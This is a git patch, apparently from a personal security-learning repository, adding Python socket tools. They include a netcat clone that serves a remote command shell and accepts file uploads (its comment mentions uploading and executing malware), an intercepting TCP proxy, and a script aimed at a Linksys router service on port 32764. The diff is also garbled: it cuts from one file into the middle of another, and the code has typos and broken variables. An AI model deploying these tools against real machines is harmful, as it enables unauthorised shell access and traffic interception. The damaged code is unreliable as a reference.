From 183bf44e32964a00e65b5cb3d390f2a6be1ea9ec Mon Sep 17 00:00:00 2001 From: Mari Wahl Date: Tue, 16 Dec 2014 18:07:32 -0500 Subject: [PATCH] network --> python socket scripts --- Network_and_802.11/README.md | 14 +- Network_and_802.11/socket/crack_linksys.py | 11 +- Network_and_802.11/socket/netcat_awesome.py | 211 ++++++++++++++++++-- Network_and_802.11/socket/netcat_simple.py | 2 +- Network_and_802.11/socket/reading_socket.py | 17 +- Network_and_802.11/socket/tcp_client.py | 0 Network_and_802.11/socket/tcp_proxy.py | 157 +++++++++++++++ Network_and_802.11/socket/tcp_server.py | 0 Network_and_802.11/socket/udp_client.py | 0 9 files changed, 371 insertions(+), 41 deletions(-) mode change 100644 => 100755 Network_and_802.11/socket/crack_linksys.py mode change 100644 => 100755 Network_and_802.11/socket/netcat_awesome.py mode change 100644 => 100755 Network_and_802.11/socket/netcat_simple.py mode change 100644 => 100755 Network_and_802.11/socket/reading_socket.py mode change 100644 => 100755 Network_and_802.11/socket/tcp_client.py create mode 100755 Network_and_802.11/socket/tcp_proxy.py mode change 100644 => 100755 Network_and_802.11/socket/tcp_server.py mode change 100644 => 100755 Network_and_802.11/socket/udp_client.py diff --git a/Network_and_802.11/README.md b/Network_and_802.11/README.md index fd70bd9..1b75004 100644 --- a/Network_and_802.11/README.md +++ b/Network_and_802.11/README.md @@ -20,12 +20,14 @@ ### socket - Several scripts with Python's **socket** module: - * netcat - * cracking linksys - * reading socket + * A very simple netcat client + * A full netcat client and server + * Cracking linksys + * Reading socket * TCP Client * TCP Server * UDP Client + * TCP Proxy ### telnetlib @@ -39,6 +41,12 @@ * traceroute +### paramiko + +- Several scripts for SSH connections: + * command + * tunneling + --- diff --git a/Network_and_802.11/socket/crack_linksys.py b/Network_and_802.11/socket/crack_linksys.py old mode 100644 new mode 100755 index a897498..7bf919b --- a/Network_and_802.11/socket/crack_linksys.py +++ b/Network_and_802.11/socket/crack_linksys.py @@ -1,4 +1,4 @@ -#!/usr/bin/env python +sisu#!/usr/bin/env python __author__ = "bt3" @@ -7,8 +7,8 @@ import struct import sys -#HOST = '192.168.1.1' -HOST = '192.168.33.1' +# Defining constants +HOST = '192.168.1.22' PORT = 32764 def send_message(s, message, payload=''): @@ -19,7 +19,7 @@ def send_message(s, message, payload=''): if len(response) != 12: print("Device is not a crackable Linksys router.") - print("Recieved invalid response: %s" % response) + print("Received invalid response: %s" % response) raise sys.exit(1) sig, ret_val, ret_len = struct.unpack(' -p " + print " -l --listen listen on HOST:PORT" + print " -e --execute=file execute the given file" + print " -c --command initialize a command shell" + print " -u --upload=destination upload file and write to destination" + print + print "Examples:" + print "netcat_awesome.py -t localhost -p 5000 -l -c" + print "netcat_awesome.py -t localhost -p 5000 -l -u=example.exe" + print "netcat_awesome.py -t localhost -p 5000 -l -e='ls'" + print "echo 'AAAAAA' | ./netcat_awesome.py -t localhost -p 5000" + sys.exit(0) - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - s.connect(( HOSTNAME, PORT)) - s.sendall(text_to_send) - s.shutdown(socket.SHUT_WR) - adata = [] - while 1: - data = s.recv(1024) - if data == "": - break - adata.append(data) +def client_sender(buffer): + # set TCP socket object + client = socket.socket( socket.AF_INET, socket.SOCK_STREAM ) - s.close() - return adata + try: + client.connect(( TARGET, PORT )) + # test to see if received any data + if len(buffer): + client.send(buffer) + while True: + # wait for data + recv_len = 1 + response = '' -if __name__ == '__main__': + while recv_len: + data = client.recv(4096) + recv_len = len(data) + response += data + if recv_len < 4096: + break + print response + + # wait for more input until there is no more data + buffer = raw_input('') + buffer += '\n' + + # send it + client.send(buffer) + + except: + print '[*] Exception. Exiting.' + client.close() + + + +def run_command(command): + command = command.rstrip() + print command + try: + output = subprocess.check_output(command, stderr=subprocess.STDOUT, \ + shell=True) + except: + output = "Failed to execute command.\r\n" + return output + + + +def client_handler(client_socket): + global UPLOAD + global EXECUTE + global COMMAND + + # check for upload + # useful for upload and execute malware, for example + if len(UP_DEST): + # read in bytes and write to destination + file_buf = '' + + # keep reading data until no more data is available + while True: + data = client_socket.recv(1024) + if data: + file_buffer += data + else: + break + + # try to write the bytes (wb for binary mode) + try: + with open(UP_DEST, 'wb') as f: + f.write(file_buffer) + client_socket.send('File saved to %s\r\n' % UP_DEST) + except: + client_socket.send('Failed to save file to %s\r\n' % UP_DEST) + + # check for command execution: + if len(EXECUTE): + output = run_command(EXECUTE) + client_socket.send(output) + + # go into a loop if a command shell was requested + if COMMAND: + while True: + # show a prompt: + client_socket.send('NETCAT: ') + cmd_buffer = '' + + # scans for a newline character to determine when to process a command + # if using with a Python client, it's necessary to add this + while '\n' not in cmd_buffer: + cmd_buffer += client_socket.recv(1024) + + # send back the command output + response = run_command(cmd_buffer) + + # send back the response + client_socket.send(response) - text_to_send = '' - text_recved = netcat(text_to_send)) - print text_recved[1] \ No newline at end of file + +def server_loop(): + server = socket.socket( socket.AF_INET, socket.SOCK_STREAM ) + server.bind(( TARGET, PORT )) + server.listen(5) + + while True: + client_socket, addr = server.accept() + client_thread = threading.Thread( target =client_handler, \ + args=(client_socket,)) + client_thread.start() + + + + +def main(): + global LISTEN + global PORT + global EXECUTE + global COMMAND + global UP_DEST + global TARGET + + + if not len(sys.argv[1:]): + usage() + + # parse the arguments + try: + opts, args = getopt.getopt(sys.argv[1:],"hle:t:p:cu", \ + ["help", "LISTEN", "EXECUTE", "TARGET", "PORT", "COMMAND", "UPLOAD"]) + except getopt.GetoptError as err: + print str(err) + usage() + + + # Handle the options and arguments + for o, a in opts: + if o in ('-h', '--help'): + usage() + elif o in ('-l', '--listen'): + LISTEN = True + elif o in ('-e', '--execute'): + EXECUTE = a + elif o in ('-c', '--commandshell'): + COMMAND = True + elif o in ('-u', '--upload'): + UP_DEST = a + elif o in ('-t', '--target'): + TARGET = a + elif o in ('-p', '--port'): + PORT = int(a) + else: + assert False, "Unhandled option" + + + # NETCAT client (just sending data) + if not LISTEN and len(TARGET) and PORT > 0: + buffer = sys.stdin.read() + client_sender(buffer) + + + # NETCAT server + if LISTEN: + if not len(TARGET): + TARGET = '0.0.0.0' + server_loop() + + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/Network_and_802.11/socket/netcat_simple.py b/Network_and_802.11/socket/netcat_simple.py old mode 100644 new mode 100755 index 91f62a8..bf08752 --- a/Network_and_802.11/socket/netcat_simple.py +++ b/Network_and_802.11/socket/netcat_simple.py @@ -5,7 +5,7 @@ import socket -# Definning constants +# Defining constants PORT = 12345 HOSTNAME = '54.209.5.48' diff --git a/Network_and_802.11/socket/reading_socket.py b/Network_and_802.11/socket/reading_socket.py old mode 100644 new mode 100755 index d4bb6d2..68635b4 --- a/Network_and_802.11/socket/reading_socket.py +++ b/Network_and_802.11/socket/reading_socket.py @@ -5,14 +5,10 @@ import os import socket -import select -from time import sleep -import binascii -from subprocess import Popen,STDOUT,PIPE -import os -from math import * -import string +from subprocess import Popen, STDOUT, PIPE +# Defining constants +SHELL_COMMAND = "nc 54.209.5.48 12345" def next_line(stdout): @@ -32,12 +28,12 @@ def write(stdin,val): def nl(): - # shorter next line for iteration + # next line for iteration return next_line(p.stdout) def wr(val): - # shorter write for iteration + # write for iteration write(p.stdin,val) @@ -48,14 +44,11 @@ def ntext(): return line[len("psifer text:") + 1:] - def main(): - SHELL_COMMAND = "nc 54.209.5.48 12345" p = Popen(SHELL_COMMAND, shell=True, cwd="./", stdin=PIPE, stdout=PIPE, stderr=STDOUT,close_fds=True) - while True: text = ntext() text += " -> just an example" diff --git a/Network_and_802.11/socket/tcp_client.py b/Network_and_802.11/socket/tcp_client.py old mode 100644 new mode 100755 diff --git a/Network_and_802.11/socket/tcp_proxy.py b/Network_and_802.11/socket/tcp_proxy.py new file mode 100755 index 0000000..50cc68a --- /dev/null +++ b/Network_and_802.11/socket/tcp_proxy.py @@ -0,0 +1,157 @@ +#!/usr/bin/env python + +__author__ = "bt3" + + +import socket +import threading +import sys + +# Output the packet details with both hexadecimal and ASCII-printable +# characters. Useful to understanding unknown protocols, finding user +# credentials, etc. +def hexdump(src, length=16): + result = [] + digists = 4 if isinstance(src, unicode) else 2 + for i in range(len(src), lenght): + s = src[i:i+length] + hexa = b' '.join(['%0*X' % (digits, ord(x)) for x in s]) + text = b''.join([x if 0x20 <= ord(x) < 0x7F else b'.' for x in s]) + result.append(b"%04X %-*s %s" % (i, length*(digits + 1), hexa, text)) + +# Used for receiving local and remote data, and pass in the socket object. +def receive_from(connection): + buffer = '' + + # set 2 second timeout + # mb too much if you are proxying to other countries + connection.settimeout(2) + try: + while True: + data = connection.recv(4096) + if not data: + break + buffer += data + except: + pass + return buffer + +def request_handler(buffer): + # perform packet modifications + buffer += ' Yaeah!' + return buffer + +def response_handler(buffer): + # perform packet modifications + return buffer + + + +def proxy_handler(client_socket, remote_host, remote_port, receive_first): + + remote_socket = socket.socket( socket.AF_INET, socket.SOCK_STREAM) + remote_socket.connect(( remote_host, remote_port )) + + # receive data from the remote if necessary + if receive_first: + remote_buffer = receive_from(remote_socket) + hexdump(remote_buffer) + + # send it to the response handler + remote_buffer = response_handler(remote_buffer) + + # if we have data to send to client, send it: + if len(remote_buffer): + print "[<==] Sending %d bytes to localhost." %len(remote_buffer) + client_socket.send(remote_buffer) + + + # loop and read from local, send to remote, send to local + while True: + + local_buffer = receive_from(client_socket) + if len(local_buffer): + print "[==>] Received %d bytes from localhost." % len(local_buffer) + hexdump(local_buffer) + + # send it to our request handler + local_buffer = request_handler(local_buffer) + + # send off the data to the remote host + remote_socket.send(local_buffer) + print "[==>] Sent to remote." + + + remote_buffer = receive_from(remote_socket) + if len(remote_buffer): + print "[==>] Received %d bytes from remote." % len(remote_buffer) + hexdump(remote_buffer) + + # send it to our response handler + remote_buffer = response_handler(remote_buffer) + + # send off the data to the remote host + client_socket.send(remote_buffer) + print "[==>] Sent to localhost." + + + if not len(local_buffer) or not len(remote_buffer): + client_socket.close() + remote_socket.close() + print "[*] No more data. Closing connections" + break + + + + + +def server_loop(local_host, local_port, remote_host, remote_port, receive_first): + + server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + + try: + server.bind(( local_host, local_port)) + except: + print "[!!] Failed to listen on %s:%d" % (local_host, local_port) + sys.exit() + + print "[*] Listening on %s:%d" % (local_host, local_port) + server.listen(5) + + while True: + client_socket, addr = server.accept() + print "[==>] Received incoming connection from %s:%d" %(addr[0], addr[1]) + + # start a thread to talk to the remote host + proxy_thread = threading.Thread(target=proxy_handler, \ + args=(client_socket, remote_host, remote_port, receive_first)) + proxy_thread.start() + + +def main(): + + if len(sys.argv[1:]) != 5: + print "Usage: ./proxy.py " + print "Example: ./proxy.py 127.0.0.1 9000 10.12.122.1 9999 True" + sys.exit() + + # setup local remote target + local_host = sys.argv[1] + local_port = int(sys.argv[2]) + + # setup remote target + remote_host = sys.argv[3] + remote_port = int(sys.argv[4]) + + # tells the proxy to connect and receive data + # before sending to the remote host + if sys.argv[5] == 'True': + receive_first = True + else: + receive_first = False + + # run the listening socket + server_loop(local_host, local_port, remote_host, remote_port, receive_first) + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/Network_and_802.11/socket/tcp_server.py b/Network_and_802.11/socket/tcp_server.py old mode 100644 new mode 100755 diff --git a/Network_and_802.11/socket/udp_client.py b/Network_and_802.11/socket/udp_client.py old mode 100644 new mode 100755